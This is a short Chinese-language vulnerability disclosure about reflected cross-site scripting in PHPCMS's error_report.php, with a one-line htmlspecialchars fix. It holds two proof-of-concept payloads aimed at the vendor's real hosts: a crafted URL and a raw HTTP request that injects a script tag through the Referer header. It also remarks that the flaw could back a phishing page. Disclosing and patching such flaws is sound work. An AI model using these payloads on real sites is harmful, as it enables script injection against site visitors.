影响版本：phpcms全系列

危害等级：低

详细说明：两种版本
                1、官方demo页面为url xss.
                2、官方主站的错误报告页面，$info['error_link']去自referer,更改referer即可插入任意代码。
                危害不大，弹窗窗自娱自乐。如果实在是要构造钓鱼页面，也是可以的。

解决方案：error_report.php
                <code>
                 $info['error_link'] = htmlspecialchars($info['error_link']);
                </code>

漏洞证明：POC1：http://demo.phpcms.cn/error_report/error_report.php?title=1&contentid=1"><script>alert(/xss/)</script><"

                 POC2：
                 <code>
                 GET /error_report/error_report.php?title=1 HTTP/1.1
                 Host: www.phpcms.cn
                 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
                 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                 Accept-Language: zh-cn,zh;q=0.5
                 Accept-Encoding: gzip,deflate
                 Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
                 Keep-Alive: 300
                 Connection: keep-alive
                 Cookie: PHPSESSID=4ko75j2uund85mqgerk0fpup67
                 Referer: "><script>alert(/xss/)</script><"
                 </code>